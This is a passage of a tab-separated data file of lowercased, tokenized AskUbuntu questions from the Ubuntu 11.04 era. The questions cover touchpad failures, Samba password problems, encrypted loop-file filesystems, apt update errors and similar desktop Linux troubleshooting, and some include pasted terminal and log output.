r5c832 ieee 1394 controller ( rev 02 ) 10:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) lsusb : bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 08ff:2580 authentec , inc. aes2501 fingerprint sensor bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 004 : id 066f:8000 sigmatel , inc. mscn mp3 player bus 002 device 002 : id 03f0:171d hewlett-packard wireless ( bluetooth + wlan ) interface [ integrated module ] bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub sudo lshw -class network : *-network description : ethernet interface product : netlink bcm5787m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : eth0 version : 02 serial : 00:1a:4b:82:59 : ee capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.116 firmware=sb v2.09 latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : d0000000-d000ffff /etc/network/interfaces : auto lo iface lo inet loopback sudo rfkill list : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no
58885	trackpad/touchpad not responding on an acer aspire 5333-2880 . how can i get it to work again ?	im a new ubuntu user , well new to unix actually even if usually work with macos i had never really looked into it . i installed ubuntu on my laptop a few days ago and so far everything was going well , until all of a sudden the trackpad stopped responding . it does not move , nor it detects clicks . laptop is an acer aspire 5333-2880 running ubuntu 11.04 64bits after doing research i first thought the issue would be that my computer was not reading the trackpad , but doing : xinput list output includes : etps/2 elantech touchpad id=12 [ slave pointer ( 2 ) ] i then thought that it might have to do with kde , since some posts mentioned trouble with kde and trackpads , so i deinstalled kde and went back to gnome , still with no results . since i 've just started using this computer solely with ubuntu and had no real data saved yet , i decided to reinstall ubuntu , so that everything went back to place . i did n't have anything to loose really , anyway . then again , the problem is still there . if i plug a usb mouse , there is no problem using it . that 's how i got around to reinstall ubuntu and all . the problem began after i installed pidgin along with a few other packages , like chess , synaptic and the flash plug in for browsers ; after i restarted my computer . i really do n't know what else to do , i 've been browsing through different forums online for hours without finding an answer . i ca n't deny i 've learned more about using the terminal than i would have by poking it around by myself , but this is getting really irritating and using a mouse really beats the purpose of a laptop ( one of them anyway , at least that 's the way i see it ) . i hope someone can help me here , if you need any information form my hardware or terminal output just say so .
58887	is there a way to put the foreground job in the background with a key binding ?	to put the foreground job , in the background , i press cltr+z and then bg [ job-number ] . is there a way to do this in one step instead of two , with some cltr+ [ key ] command ? and i do n't mean the & . i want to put a process that i already started and am interacting with into the background .
58888	how to change the dash button icon ?	how can i change the ubuntu icon ? here 's a screen capture showing what i mean :
58889	how can i create a zip archive of a whole directory via terminal without hidden files ?	i have a project with lots of hidden folders / files in it . i want to create a zip-archive of it , but in the archive should n't be any hidden folders / files . if files in a hidden folder are not hidden , they should also not be included . i know that i can create a zip archive of a directory like this : zip -r zipfile.zip directory i also know that i can exclude files with the -x option , so i thought this might work : zip -r zipfile.zip directory -x . * it did n't work . all hidden directories were still in the zip-file .
58890	compiz widget layer interferes with libnotify notifications	i use the compiz widget layer plugin so as to have a fullscreen terminator window a keystroke away . the only issue i have is , when i 'm in the widget layer , notifications do n't appear , so i do n't come to know when someone sends me an im in pidgin . does anyone have a solution that can make libnotify notifications appear in the widget layer ?
58893	what do i do when bad sectors are reported ?	ubuntu says i have bad sectors on my laptop ( 186 of them to be exact ) and sometimes ca n't even boot - i 'm running a live cd now . is it the end for my hd ? if yes , any recommendations for a good laptop hd ? my machine is compaq presario cq60 .
58899	installing windows 7 using virtual box without having a cd	i would like to create a windows 7 virtual machine on my computer , but i do n't have my install disk . i currently have it installed on my computer in a dual boot with ubuntu 11.04 and was wondering if there is a way to create a virtual machine using the already installed version , without needing to procure a cd with windows 7 on it . i am reasonably tech savy but would not consider myself an expert by any means . if this is possible , would it be very difficult , and would there be any way to make it easier ?
58914	read only usb stick that wo n't let me do anything to it	somehow i messed up and accidentally made my usb stick into a read only file system . i have tried a bunch of things to delete the files , including the basic ( rm -f myfile ) and attempting to allow writing ( sudo chmod +w myfile ) and then deleting , but none of this seems to work . any ideas on what i can do . i do n't have anything on the usb stick that i need , but i do n't want to throw away an otherwise perfectly good piece of equipment . how can i make it work ? am i going about this completely the wrong way ?
58916	how to install ubuntu on free dos	i am buying a samsung rv 509 laptop which come with dos pre installed . i want to install ubuntu . i am new to linux and am baiscally a home user . please guide me ( preferably step by step ) how to install it . currently i have a xp desktop with no provision for cd burning but there is a provision for usb drive .
58923	is it possible to authenticate with ubuntu one only once with kwallet ?	kubuntu 11.04 after installing ubuntuone for kde via kpackagemanager i have to inform my authentication password twice on every boot : one for kwallet and other for a `` keyring '' , in this order . is it possible to authenticate only once , in kwallet ?
58924	modifying the speed at which a process runs ( cheat engine alternative as a flash game speed hack )	in windows , there is a tool for flash games called cheat engine which can speed up/down a process by x amount , making the time needed for a task in a game to go faster or slower than in the real world . this is specially helpful for time based games that make you wait for an x amount of time for a building to get finished , a harvest to get completed , etc ... this also applies to games that you need them to go slower so you can defend against several enemies ( zombie games , etc.. ) or games that their difficulty lies in how fast one can complete something . but this is not limited to web based flash games . cheat engine can also speed up/down other games ( half-life , quake 3 , etc.. ) . is there a way to do this in ubuntu ? here is speed hack option i am referring to by using the `` cheat engine '' tool in windows and it is actually the option that 99.99 % of cheat engine users use cheat engine for : i should mention that i am not looking for a method to pause the process every milliseconds ( like slowing down firefox or chrome instead of slowing down the flash game ) . for example slowing down firefox would not work since it also slows down everything else so it would not be a speed hack so much as slowing down the process in general including all actions by the user . basically everything would be the same , just slower . the same goes for speeding the process up . i am looking for a way to do this to web based flash games and/or wine emulated games .
58928	update manager says 'not all updates can be installed '	i have 11.04 installed with gnome 3 and everything was working fine until i tried to run the update manager . now i ca n't update any of my packages . a similar question was posted awhile ago but no solution was presented edit output from sudo apt-get update & & sudo apt-get upgrade ign http : //extras.ubuntu.com natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //us.archive.ubuntu.com natty inrelease ign http : //us.archive.ubuntu.com natty-updates inrelease ign http : //security.ubuntu.com natty-security inrelease hit http : //extras.ubuntu.com natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //us.archive.ubuntu.com natty release.gpg hit http : //security.ubuntu.com natty-security release.gpg hit http : //extras.ubuntu.com natty release hit http : //ppa.launchpad.net natty release hit http : //us.archive.ubuntu.com natty-updates release.gpg hit http : //security.ubuntu.com natty-security release hit http : //extras.ubuntu.com natty/main sources hit http : //us.archive.ubuntu.com natty release hit http : //ppa.launchpad.net natty/main sources hit http : //security.ubuntu.com natty-security/main sources hit http : //extras.ubuntu.com natty/main i386 packages ign http : //extras.ubuntu.com natty/main translationindex hit http : //us.archive.ubuntu.com natty-updates release hit http : //ppa.launchpad.net natty/main i386 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //security.ubuntu.com natty-security/restricted sources hit http : //security.ubuntu.com natty-security/universe sources hit http : //security.ubuntu.com natty-security/multiverse sources hit http : //security.ubuntu.com natty-security/main i386 packages hit http : //security.ubuntu.com natty-security/restricted i386 packages hit http : //us.archive.ubuntu.com natty/main sources hit http : //us.archive.ubuntu.com natty/restricted sources hit http : //us.archive.ubuntu.com natty/universe sources hit http : //us.archive.ubuntu.com natty/multiverse sources hit http : //us.archive.ubuntu.com natty/main i386 packages hit http : //security.ubuntu.com natty-security/universe i386 packages hit http : //security.ubuntu.com natty-security/multiverse i386 packages ign http : //security.ubuntu.com natty-security/main translationindex ign http : //security.ubuntu.com natty-security/multiverse translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex ign http : //security.ubuntu.com natty-security/universe translationindex hit http : //us.archive.ubuntu.com natty/restricted i386 packages hit http : //us.archive.ubuntu.com natty/universe i386 packages hit http : //us.archive.ubuntu.com natty/multiverse i386 packages ign http : //us.archive.ubuntu.com natty/main translationindex ign http : //us.archive.ubuntu.com natty/multiverse translationindex ign http : //us.archive.ubuntu.com natty/restricted translationindex ign http : //us.archive.ubuntu.com natty/universe translationindex hit http : //us.archive.ubuntu.com natty-updates/main sources hit http : //us.archive.ubuntu.com natty-updates/restricted sources hit http : //us.archive.ubuntu.com natty-updates/universe sources hit http : //us.archive.ubuntu.com natty-updates/multiverse sources hit http : //us.archive.ubuntu.com natty-updates/main i386 packages hit http : //us.archive.ubuntu.com natty-updates/restricted i386 packages hit http : //us.archive.ubuntu.com natty-updates/universe i386 packages hit http : //us.archive.ubuntu.com natty-updates/multiverse i386 packages ign http : //us.archive.ubuntu.com natty-updates/main translationindex ign http : //us.archive.ubuntu.com natty-updates/multiverse translationindex ign http : //us.archive.ubuntu.com natty-updates/restricted translationindex ign http : //us.archive.ubuntu.com natty-updates/universe translationindex ign http : //extras.ubuntu.com natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //extras.ubuntu.com natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //security.ubuntu.com natty-security/main translation-en_us ign http : //security.ubuntu.com natty-security/main translation-en ign http : //security.ubuntu.com natty-security/multiverse translation-en_us ign http : //security.ubuntu.com natty-security/multiverse translation-en ign http : //security.ubuntu.com natty-security/restricted translation-en_us ign http : //security.ubuntu.com natty-security/restricted translation-en ign http : //security.ubuntu.com natty-security/universe translation-en_us ign http : //security.ubuntu.com natty-security/universe translation-en ign http : //us.archive.ubuntu.com natty/main translation-en_us ign http : //us.archive.ubuntu.com natty/main translation-en ign http : //us.archive.ubuntu.com natty/multiverse translation-en_us ign http : //us.archive.ubuntu.com natty/multiverse translation-en ign http : //us.archive.ubuntu.com natty/restricted translation-en_us ign http : //us.archive.ubuntu.com natty/restricted translation-en ign http : //us.archive.ubuntu.com natty/universe translation-en_us ign http : //us.archive.ubuntu.com natty/universe translation-en ign http : //us.archive.ubuntu.com natty-updates/main translation-en_us ign http : //us.archive.ubuntu.com natty-updates/main translation-en ign http : //us.archive.ubuntu.com natty-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com natty-updates/multiverse translation-en ign http : //us.archive.ubuntu.com natty-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com natty-updates/restricted translation-en ign http : //us.archive.ubuntu.com natty-updates/universe translation-en_us ign http : //us.archive.ubuntu.com natty-updates/universe translation-en reading package lists ... done reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : brasero brasero-cdrkit brasero-common empathy empathy-common eog evince evince-common gedit gedit-common gnome-disk-utility gnome-keyring gnome-media gnome-shell gnome-system-monitor gnome-terminal gnome-terminal-data gnome-themes-selected gucharmap gvfs gvfs-backends gvfs-fuse libcanberra-pulse libcanberra0 libgcr0 libgdu-gtk0 libgnome-keyring0 libgtk-vnc-1.0-0 libgucharmap7 light-themes linux-generic-pae linux-headers-generic-pae linux-image-generic-pae nautilus-sendto-empathy seahorse totem totem-common totem-mozilla totem-plugins vinagre yelp zenity 0 upgraded , 0 newly installed , 0 to remove and 42 not upgraded . edit 3 after installing each of the packages ( via sudo apt-get install [ package ] ) that were held back , everything seems to be normal . so why did i have to reinstall everything ? i 'm assuming it has todo with gnome3 since every package was installed via their repo .
58931	how do i prevent samba database `` corruption ? ''	i 've got issues with my samba configuration . i 've been running samba for about 12 or 13 years , and i 've never seen this before . there was a time when i was pretty knowledgeable about windows domains , but the windows world has passed me by , and the various facets of samba that have grown along with active directory are confusing me . my setup is really straightforward . i 've just got a single server with some disk space and a printer that i want to share among 4 other computers . for all these years , i have been using a simple domain with a single pdc . lately , something has changed . i ca n't figure out if it 's been going to lucid or whether it was a particular update with samba , but something keeps breaking in my database . from time to time , my account 's password will become `` wrong . '' i 'll be able to login -- using cached credentials , i presume -- but i wo n't be able to mount the drives or print to the printer . i think it 's happening about every 30 days . maybe it 's 45 . i 've been dealing with this by just resetting the password on the server , but this has become really annoying . also , i 'm noticing from the logs that the machine passwords are becoming fouled up as well . i finally guessed that my database -- that i 've migrated and updated for about a dozen years now -- was just too out of date , so i deleted it and started from scratch on a new domain . now it 's happening again , so that clearly was n't the problem . i thought maybe it was just my windows 7 box , but now my xp machines are doing it too . i would n't think that it 's a password expiration policy thing . if it were , i should be getting a prompt that says it 's time to change my password , right ? when i go to investigate such a thing , i get lost with all the various permutations of net and pdbedit and wbinfo commands . i 'm used to not needing them in general . i think i 've added my account into the `` domain administrators '' group with one of them at some point , but i do n't remember how that 's done . i 'm especially confused with the docs regarding whether i should have winbind running at all in my configuration . i do n't think i do , but obviously running wbinfo to do diagnostics needs it , and i figure i 'm not hurting anything by having it running . it runs by default in ubuntu , so i 've wanted to leave it and work with it if possible . winbind is not referenced in my /etc/nsswitch.conf . i 'm getting lots of interesting error messages in my logs , but google is n't leading me to understanding any of them . here 's one in smb.conf telling me that one of my workstations is n't connected correctly : [ 2011/08/27 19:02:04 , 0 ] rpc_server/srv_netlog_nt.c:603 ( _netr_serverauthenticate3 ) _netr_serverauthenticate3 : netlogon_creds_server_check failed . rejecting auth request from client proxima machine account proxima $ lots of this one from log.winbindd-idmap on google , with no clear indication of what might be wrong or if it even needs fixing . ( and , yeah , i need idmapd for nfsv4 . ) seems particular to ubuntu . i have n't a clue what might be `` incomplete '' about my `` configuration . '' [ 2011/08/27 19:02:04 , 0 ] winbindd/idmap_tdb.c:287 ( idmap_tdb_open_db ) upgrade of idmap_version from -1 to 2 is not possible with incomplete configuration [ 2011/08/27 19:02:04 , 1 ] winbindd/idmap.c:321 ( idmap_init_domain ) idmap initialization returned nt_status_unsuccessful i think this one from log.winbindd is harmless , as winbindd is just figuring out if my server is a pdc or something else : [ 2011/08/27 17:55:46 , 0 ] libsmb/namequery.c:75 ( saf_store ) saf_store : refusing to store 0 length domain or servername ! [ 2011/08/27 17:55:46 , 1 ] rpc_client/cli_pipe.c:949 ( cli_pipe_validate_current_pdu ) cli_pipe_validate_current_pdu : rpc fault code dcerpc_fault_op_rng_error received from host excelsior ! finally , here 's my smb.conf : [ global ] workgroup = starfleet map to guest = bad user obey pam restrictions = yes smb passwd file = /var/lib/samba/passdb.tdb private dir = /var/lib/samba pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes log level = 2 load printers = yes printcap name = cups add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u add group script = /usr/sbin/addgroup -- force-badname % g add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u logon script = % u.bat logon path = logon drive = z : logon home = domain logons = yes os level = 65 preferred master = yes domain master = yes wins support = yes usershare allow guests = yes use sendfile = yes [ homes ] comment = home directories path = /data/users/ % u valid users = % s read only = no create mask = 0700 directory mask = 0700 [ netlogon ] comment = network logon service path = /var/lib/samba/netlogon guest ok = yes browseable = no browsable = no share modes = no [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes browseable = yes browsable = yes [ data ] path = /data read only = no guest ok = yes [ temp ] path = /data/temp read only = no guest ok = yes [ homes ] comment = home directories path = /data/users/ % u valid users = % s read only = no create mask = 0700 directory mask = 0700 so ... what 's going on , and how do i fix it ?
58932	how can i install ubuntu server on an powerpc mac ?	i have an original mac mini ( pre-late 2005 model ) that i bought at an auction . the computer was completely wiped clean . there were no disks given with the computer . i turn the computer on and it loads a gray screen with a folder in the center , blinking with the question mark and smiley face . here 's what 's i 've tried . i burned ubuntu on to a cd using another computer and loaded it into the mini . i reset the computer and waited for the cd to load . the cd never loaded . i took the cd out and restarted the computer . i made a usb install drive , following the instructions on ubuntu 's website . i turned off the mac mini . i inserted the usb into the mac mini . i turned on the mac mini while holding down the alt key . a purple screen comes on with two buttons , one for 'refresh ' and one for 'next ' . there are no other buttons or items on the screen ( excluding the mouse ) . my question : how do i install ubuntu on this mac mini ?
58935	how do i create an encrypted file system inside a file ?	recently i 've found this interesting tutorial : http : //flossstuff.wordpress.com/2011/08/07/using-a-file-as-a-storage-device/ it explains how to create an empty file , format it as ext4 , and mount it as a device . i 'd like to know if it can be created as an encrypted ext4 file system . i 've tried using palimpsest ( the disk utility found in system menu ) to format the already created file system but it does n't works as it detects the file system being used . if i try to unmount the file system , it wo n't work neither because it does n't detect the device ( since it 's not a real device like a hardrive or a usb drive ) . so my question is , is there an option to create the file system encrypted from the begining ? i 've used these commands : create an empty file 200mb size : dd if=/dev/zero of=/path/to/file bs=1m count=200 make it ext4 : mkfs -t ext4 file mount it in a folder inside my home : sudo mount -o loop file /path/to/mount_point is there any way the mkfs command creates the ext4 encrypted asking for a decryption password ? i 'm planing to use this as a way to encrypt files inside dropbox .
58936	how to revert software sources back to default ?	i had a little problem with the sources of my update , i 'm running ubuntu natty narwhal and i was tinkering with binaries for installing a firefox add-on called fire sheep and i think that some how my update sources were altered and evertime i try to upate i get this error message an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'see ' is not known on line 2 in source list /etc/apt/sources.list'
58938	setting up ubuntu-open suse dual boot	i 'm running ubuntu 10.10 , but i was to also test out the newest versions of open suse . i want to dual boot between ubuntu 10.10 and open suse 11.4 . is there a quick solution to set this up , perhaps via the open suse iso installer ?
58939	multimonitor menu bar	does anyone know of a way of extending the menu bar from one screen all the way across to the other , so that the gnome menu bar spans both/all monitors ? i 'm basically looking for something similiar to multimon for linux .
58940	unity side bar freeze bug	i just installed ubuntu 11.04 and the side bar of the unity interface tends to freeze after a certain period of time and i can only fix it by restartyng the computer . what is the cause ? or is it just a bug that will be fixed in the future ?
58941	shutdown menu missing from unity indicators	i found that i 'm missing the shutdown or session indicator , i believe , from my list of indicators . what am i missing ?
58945	how do i remove items from the grub menu ?	while booting the system shows two impressions ( ubuntu.2.6.38-11-generic and ubuntu 2.6.38-11-generic ) are shown in the boot menu . how can i merge them or get rid of the older version ?
58946	can a server handle simultaneous shell commands ?	i 'm writing a very simple browser based mp3 player in php . part of this project requires that every mp3 file is converted to a wav file . there 's a function in php called shell_exec that allows you to execute a command via the shell . for my project , whenever someone uploads a song to their account , the following command would be executed : shell_exec ( 'ffmpeg -i inputsong.mp3 outputsong.wav ' ) so let 's say there are 10 different people who finish uploading a song at the same exact time . does the linux server execute 10 shell commands simultaneously or does it only do one at a time ? if a server can handle multiple shell commands simultaneously , would the server be able to handle converting 10 different songs at the same time or does it only do one at a time ?
58947	will the new networkmanager 0.9 be included in 11.10 and what features will it bring ?	today i read that the 0.9 version of network manager which comes with `` ton of great changes '' ( which actually does not say much ; ) ) was released so i was wondering if it will be coming with ubuntu 11.10 and if yes what features does it bring since they are not mentioned in the main web page of the network manager .
58951	how do i speed up boot time ?	i am dual-booting ubuntu and windows 7 . when i select ubuntu at the grub menu , a blinking cursor in a black screen comes and takes some 30-40 seconds . then ubuntu opens normally and fast . how do i reduce the time the blinking cursor takes ( or remove it if possible ) ?
58955	how do i install filezilla server ?	i 'm trying to get filezilla ftp server and install it , but i ca n't find out how to . can anyone help ?
58960	3d-accelerated adobe flash ?	how can i get flash to be 3d-accelerated for a computer with a powerful discrete graphics card ? is there any specific version of flash required or specific configuration for it ?
58967	how do i make my windows minimize like a mac in classic gnome ?	how do i make my ubuntu windows do this ?
58968	ca n't access ubuntu one contacts	i downgraded my package to the ubuntu one free package and am now unable to access my contacts although the contacts are still shown on the welcome page . when i click on the `` view contacts '' it brings me to a page that says `` something has gone wrong '' and advises me to try again later , but this is the same for a number of weeks . i can still access my files and mailed the help desk but have n't received any response . has anyone else encountered the same problem ? regards fergus
58969	how to play window 's steam games from linux ?	i have two partitions , one with windows 7 and all my games , and other with ubuntu . i want to play my windows steam games without having to download all the games in my linux steam . is it possible ?
58972	unable to connect to broadband connection with two lan card	i have installed ubuntu on my system , which has two lan card . one of the lan card is not working . but the other do work . i have tried configuring the internet connection but failed .
58974	issues after marlin file browser installation ?	someday ago i tried the marlin file browser ( a nice crossover between thunar , nautilus and windows explorer ) from elementary-dev ppa . then i 've encountered some troubles in updating packages . playonlinux ( that i sometimes use ) stopped to work but other python apps seems to work ( however i 've problems at every system update ) . edit : it seems the ppas i 've disabled in synaptic are still present in ubuntu configuration . restoring `` official sources.list '' can resolve my issues ? thanks in advance for your help : ) raffaele @ natty : ~ $ lang=en_us ; sudo apt-get update [ sudo ] password for raffaele : ign http : //ubuntu.fastbull.org natty inrelease ign http : //ubuntu.fastbull.org natty-security inrelease ign http : //security.ubuntu.com natty-security inrelease ign http : //archive.canonical.com natty inrelease ign http : //ubuntu.fastbull.org natty-updates inrelease ign http : //ubuntu.fastbull.org natty-proposed inrelease ign http : //ubuntu.fastbull.org natty-backports inrelease hit http : //ubuntu.fastbull.org natty release.gpg ign http : //extras.ubuntu.com natty inrelease hit http : //security.ubuntu.com natty-security release.gpg hit http : //ubuntu.fastbull.org natty-security release.gpg hit http : //ubuntu.fastbull.org natty-updates release.gpg hit http : //ubuntu.fastbull.org natty-proposed release.gpg hit http : //archive.canonical.com natty release.gpg get:1 http : //extras.ubuntu.com natty release.gpg [ 72 b ] hit http : //ubuntu.fastbull.org natty-backports release.gpg hit http : //security.ubuntu.com natty-security release hit http : //archive.canonical.com natty release hit http : //ubuntu.fastbull.org natty release hit http : //ubuntu.fastbull.org natty-security release hit http : //ubuntu.fastbull.org natty-updates release hit http : //extras.ubuntu.com natty release hit http : //ubuntu.fastbull.org natty-proposed release hit http : //ubuntu.fastbull.org natty-backports release hit http : //security.ubuntu.com natty-security/universe amd64 packages hit http : //archive.canonical.com natty/partner sources hit http : //ubuntu.fastbull.org natty/restricted sources hit http : //security.ubuntu.com natty-security/main amd64 packages hit http : //security.ubuntu.com natty-security/multiverse amd64 packages hit http : //security.ubuntu.com natty-security/restricted amd64 packages ign http : //security.ubuntu.com natty-security/main translationindex ign http : //security.ubuntu.com natty-security/multiverse translationindex hit http : //archive.canonical.com natty/partner amd64 packages ign http : //archive.canonical.com natty/partner translationindex hit http : //ubuntu.fastbull.org natty/main sources hit http : //ubuntu.fastbull.org natty/universe sources hit http : //extras.ubuntu.com natty/main sources hit http : //ubuntu.fastbull.org natty/multiverse sources hit http : //ubuntu.fastbull.org natty/main amd64 packages hit http : //ubuntu.fastbull.org natty/universe amd64 packages hit http : //ubuntu.fastbull.org natty/restricted amd64 packages hit http : //ubuntu.fastbull.org natty/multiverse amd64 packages ign http : //ubuntu.fastbull.org natty/main translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex ign http : //security.ubuntu.com natty-security/universe translationindex ign http : //ubuntu.fastbull.org natty/multiverse translationindex ign http : //ubuntu.fastbull.org natty/restricted translationindex hit http : //extras.ubuntu.com natty/main amd64 packages ign http : //extras.ubuntu.com natty/main translationindex ign http : //ubuntu.fastbull.org natty/universe translationindex hit http : //ubuntu.fastbull.org natty-security/universe sources hit http : //ubuntu.fastbull.org natty-security/main sources hit http : //ubuntu.fastbull.org natty-security/multiverse sources hit http : //ubuntu.fastbull.org natty-security/restricted sources hit http : //ubuntu.fastbull.org natty-updates/universe sources hit http : //ubuntu.fastbull.org natty-updates/main sources hit http : //ubuntu.fastbull.org natty-updates/multiverse sources hit http : //ubuntu.fastbull.org natty-updates/restricted sources hit http : //ubuntu.fastbull.org natty-updates/universe amd64 packages hit http : //ubuntu.fastbull.org natty-updates/main amd64 packages hit http : //ubuntu.fastbull.org natty-updates/multiverse amd64 packages hit http : //ubuntu.fastbull.org natty-updates/restricted amd64 packages ign http : //ubuntu.fastbull.org natty-updates/main translationindex ign http : //ubuntu.fastbull.org natty-updates/multiverse translationindex ign http : //ubuntu.fastbull.org natty-updates/restricted translationindex ign http : //ubuntu.fastbull.org natty-updates/universe translationindex hit http : //ubuntu.fastbull.org natty-proposed/universe sources hit http : //ubuntu.fastbull.org natty-proposed/main sources hit http : //ubuntu.fastbull.org natty-proposed/multiverse sources hit http : //ubuntu.fastbull.org natty-proposed/restricted sources hit http : //ubuntu.fastbull.org natty-proposed/universe amd64 packages hit http : //ubuntu.fastbull.org natty-proposed/main amd64 packages hit http : //ubuntu.fastbull.org natty-proposed/multiverse amd64 packages hit http : //ubuntu.fastbull.org natty-proposed/restricted amd64 packages ign http : //ubuntu.fastbull.org natty-proposed/main translationindex ign http : //ubuntu.fastbull.org natty-proposed/multiverse translationindex ign http : //ubuntu.fastbull.org natty-proposed/restricted translationindex ign http : //ubuntu.fastbull.org natty-proposed/universe translationindex hit http : //ubuntu.fastbull.org natty-backports/universe sources hit http : //ubuntu.fastbull.org natty-backports/main sources hit http : //ubuntu.fastbull.org natty-backports/multiverse sources hit http : //ubuntu.fastbull.org natty-backports/restricted sources hit http : //ubuntu.fastbull.org natty-backports/universe amd64 packages hit http : //ubuntu.fastbull.org natty-backports/main amd64 packages hit http : //ubuntu.fastbull.org natty-backports/multiverse amd64 packages hit http : //ubuntu.fastbull.org natty-backports/restricted amd64 packages ign http : //ubuntu.fastbull.org natty-backports/main translationindex ign http : //ubuntu.fastbull.org natty-backports/multiverse translationindex ign http : //ubuntu.fastbull.org natty-backports/restricted translationindex ign http : //ubuntu.fastbull.org natty-backports/universe translationindex hit http : //ubuntu.fastbull.org natty/main translation-it hit http : //ubuntu.fastbull.org natty/multiverse translation-it hit http : //ubuntu.fastbull.org natty/restricted translation-it hit http : //ubuntu.fastbull.org natty/universe translation-it ign http : //archive.canonical.com natty/partner translation-en ign http : //archive.canonical.com natty/partner translation-it ign http : //extras.ubuntu.com natty/main translation-en ign http : //security.ubuntu.com natty-security/main translation-en ign http : //security.ubuntu.com natty-security/main translation-it ign http : //extras.ubuntu.com natty/main translation-it ign http : //security.ubuntu.com natty-security/multiverse translation-en ign http : //security.ubuntu.com natty-security/multiverse translation-it ign http : //security.ubuntu.com natty-security/restricted translation-en ign http : //security.ubuntu.com natty-security/restricted translation-it ign http : //security.ubuntu.com natty-security/universe translation-en ign http : //security.ubuntu.com natty-security/universe translation-it ign http : //ubuntu.fastbull.org natty/main translation-en ign http : //ubuntu.fastbull.org natty/multiverse translation-en ign http : //ubuntu.fastbull.org natty/restricted translation-en ign http : //ubuntu.fastbull.org natty/universe translation-en ign http : //ubuntu.fastbull.org natty-updates/main translation-en ign http : //ubuntu.fastbull.org natty-updates/main translation-it ign http : //ubuntu.fastbull.org natty-updates/multiverse translation-en ign http : //ubuntu.fastbull.org natty-updates/multiverse translation-it ign http : //ubuntu.fastbull.org natty-updates/restricted translation-en ign http : //ubuntu.fastbull.org natty-updates/restricted translation-it ign http : //ubuntu.fastbull.org natty-updates/universe translation-en ign http : //ubuntu.fastbull.org natty-updates/universe translation-it ign http : //ubuntu.fastbull.org natty-proposed/main translation-en ign http : //ubuntu.fastbull.org natty-proposed/main translation-it ign http : //ubuntu.fastbull.org natty-proposed/multiverse translation-en ign http : //ubuntu.fastbull.org natty-proposed/multiverse translation-it ign http : //ubuntu.fastbull.org natty-proposed/restricted translation-en ign http : //ubuntu.fastbull.org natty-proposed/restricted translation-it ign http : //ubuntu.fastbull.org natty-proposed/universe translation-en ign http : //ubuntu.fastbull.org natty-proposed/universe translation-it ign http : //ubuntu.fastbull.org natty-backports/main translation-en ign http : //ubuntu.fastbull.org natty-backports/main translation-it ign http : //ubuntu.fastbull.org natty-backports/multiverse translation-en ign http : //ubuntu.fastbull.org natty-backports/multiverse translation-it ign http : //ubuntu.fastbull.org natty-backports/restricted translation-en ign http : //ubuntu.fastbull.org natty-backports/restricted translation-it ign http : //ubuntu.fastbull.org natty-backports/universe translation-en ign http : //ubuntu.fastbull.org natty-backports/universe translation-it fetched 72 b in 2s ( 27 b/s ) reading package lists ... done n : ignoring file 'getdeb.list.bck ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension raffaele @ natty : ~ $ lan=en_us ; sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 5 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` it_it : en '' , lc_all = ( unset ) , lang = `` en_us '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up libgl1-mesa-glx ( 7.10.2-0ubuntu2.1 ) ... update-alternatives : error : alternative link /usr/lib/xorg/extra-modules is already managed by x86_64-linux-gnu_gl_conf . dpkg : error processing libgl1-mesa-glx ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of libglu1-mesa : libglu1-mesa depends on libgl1-mesa-glx | libgl1 ; however : package libgl1-mesa-glx is not configured yet . package libgl1 is not installed . package libgl1-mesa-glx which provides libgl1 is not configured yet . package libgl1-mesa-swx11 which provides libgl1 is not installed . dpkg : error processing libglu1-mesa ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libwxgtk2.8-0 : libwxgtk2.8-0 depends on libgl1-mesa-glx | libgl1 ; however : package libgl1-mesa-glx is not configured yet . package libgl1 is not installed . package libgl1-mesa-glx which provides libgl1 is not configured yet . package libgl1-mesa-swx11 which provides libgl1 is not installed . libwxgtk2.8-0 depends on libglu1-mesa | libglu1 ; however : package libglu1-mesa isno apport report written because the error message indicates 